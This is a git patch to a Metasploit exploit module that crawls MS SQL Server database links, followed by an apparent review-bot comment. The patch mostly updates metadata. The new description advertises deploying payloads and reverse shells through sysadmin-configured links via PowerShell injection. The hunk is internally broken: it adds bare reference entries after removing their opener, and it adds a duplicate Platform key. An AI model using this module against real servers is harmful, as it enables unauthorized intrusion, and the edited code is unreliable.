From 0246e921c5018bd751d76b799e051a2ef067f25a Mon Sep 17 00:00:00 2001
From: nullbind
Date: Mon, 5 Nov 2012 12:45:54 -0600
Subject: [PATCH] style, ref, desc, and author updates
---
 .../windows/mssql/mssql_linkcrawler.rb | 30 ++++++++++++++-----
 1 file changed, 22 insertions(+), 8 deletions(-)
diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
index a5c846af6a..9f37d7c388 100644
--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -7,21 +7,35 @@ class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::MSSQL
 include Msf::Auxiliary::Report
 include Msf::Exploit::CmdStagerVBS
- #include Msf::Exploit::EXE
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Microsoft SQL Server - Database Link Crawler',
- 'Description' => %q{When provided credentials, this module will crawl
- SQL Server database links and identify links configured with sysadmin privileges.},
+ 'Description' => %q{This module can be used to crawl MS SQL Server
+ database links and deploy metasploit payloads through links configured
+ with sysadmin privileges using a valid SQL Server Login. If you are
+ attempting to obtain multiple reverse shells using this module we
+ recommend setting the "DisablePayloadHandler" advanced option to "true",
+ and setting up a multi/handler to run in the background as a job to
+ support multiple incoming shells. If you are interested in deploying
+ payloads to spefic servers this module also supports that functionality
+ via the "DEPLOYLIST" option. Currently, the module is capable of
+ delivering payloads to both 32bit and 64bit Windows systems via
+ powershell memory injection methods based on Matthew Graeber's work.
+ As a result, the target server must have powershell installed.
+ By default, all of the crawl information is saved to a CSV formatted
+ log file and MSF loot so that the tool can also be used for auditing
+ without deploying payloads.},
 'Author' => [
- 'Antti Rantasaari ',
- 'nullbind '
+ 'Antti Rantasaari ',
+ 'Scott Sutherland "nullbind" '
 ],
- 'Platform' => [ 'Windows' ],
+ 'Platform' => [ 'win' ],
 'License' => MSF_LICENSE,
- 'References' => [[ 'URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
+ ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
+ ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']],
 'Platform' => 'win',
 'DisclosureDate' => 'Jan 1 2000',
 'Targets' =>
@@ -473,7 +487,7 @@ $winFunc::CreateThread(0,0,$x,0,0,0)"
 # Write base64 encoded powershell payload to temp file
 # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations
- # Also, line number tracking was added so that duplication lines causes by nested linked
+ # Also, line number tracking was added so that duplication lines caused by nested linked
 # queries could be found and removed.
 print_status("Deploying payload...")
 linenum = 0
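Review bot: In the first hunk (`@@ -7,21 +7,35 @@`) the added `'Platform' => [ 'win' ],` duplicates the `'Platform' => 'win',` key that remains a few lines below as context, so the hash passed to `update_info` defines the key twice and Ruby keeps only the last value; the array form added here never takes effect. Drop the added line and keep the single `'Platform' => 'win',`. The new Description also misspells "specific" as "spefic". `'DisclosureDate' => 'Jan 1 2000'` in the trailing context looks like a placeholder, though this commit does not touch it. The `initialize` body continues outside the hunk.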